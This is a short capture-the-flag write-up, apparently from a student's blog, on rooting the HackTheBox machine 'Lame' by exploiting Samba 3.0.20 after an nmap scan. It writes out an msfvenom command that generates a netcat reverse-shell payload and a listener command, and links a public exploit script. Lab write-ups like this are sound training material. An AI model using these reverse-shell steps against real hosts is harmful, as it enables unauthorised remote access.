Lame HTB Writeup

3 min readJun 28, 2021

Hi everyone, this is my writeup for box “Lame” found on HackTheBox .

I am a student looking forward to my OSCP Exam preparation. So, I decided to solve the famous TJNull’s list of boxes. Here is the first writeup from it.

Overview : Anonymous FTP Login, SMB 3.0.20 Exploit to get Reverse Shell

IP address of the Machine : 10.10.10.3

Phase 1 : Recon

1. Starting off with an Nmap Scan to get information about the open ports.

nmap -sC -sV -Pn 10.10.10.3

We get the following results from the nmap scan.

We have 4 Ports open :

Port 21:Running FTP vsftpd 2.3.4

Port 22 : Running OpenSSH 4.7 p1

Port 139 and Port 445 : Running Samba 3.0.20

Part 2 : Enumeration

As we can use Anonymous login to login into FTP. ( From Nmap Scan ) So, let’s try connecting via FTP.

But there were no files we could access using FTP.

Moving On, Let’s Google about “Samba 3.0.20 Exploit” and BINGO!! there are several exploits.

But But…. Be aware of using Metasploit modules as we can’t use them in OSCP.

So I found an exploit that we could use.

https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

We could use it But we have to add our payload for Reverse Shell.

We can use msfvenom to generate the Reverse Shell payload.

msfvenom -p cmd/unix/reverse_netcat LHOST=<YOUR IP> LPORT=<PORT NO> -f python

Start a Netcat listener in other tab in order to get the reverse shell.

nc -nvlp <PORT NO>

Now run the exploit after replacing the Reverse Shell Payload. I encountered some problems while running the exploit….

Error1 :

Error 2 :

So, I googled about them and found solutions to those If you face the same error you can refer to the links mentioned below:

smbprotocol

SMBv2 and v3 Client for both Python 2 and 3. SMB is a network file sharing protocol and has numerous iterations over…

pypi.org

https://stackoverflow.com/questions/606191/convert-bytes-to-a-string

After making the above changes the final exploit will look liked this :

Part 3 : Getting Flags

Fire the exploit and this time You will get a reverse Shell In the Netcat listener you started in the another tab.

We get the Reverse Shell as “Root”.

Getting the user and root flags are now a piece of cake.

And the machine is pwned.

Things I learned from this Box :

→ Having some knowledge of python is a must in order to understand and make the exploit work.

So this was my first of the many more upcoming writeup’s from the list. So, Keep in tune and Thanks for reading the Writeup. I hope you liked it.

Any type of feedback or suggestions are appreciated.

You can reach out to me on :

Twitter : https://twitter.com/Viren2737

LinkedIn : https://www.linkedin.com/in/viren-saroha-3391371a3/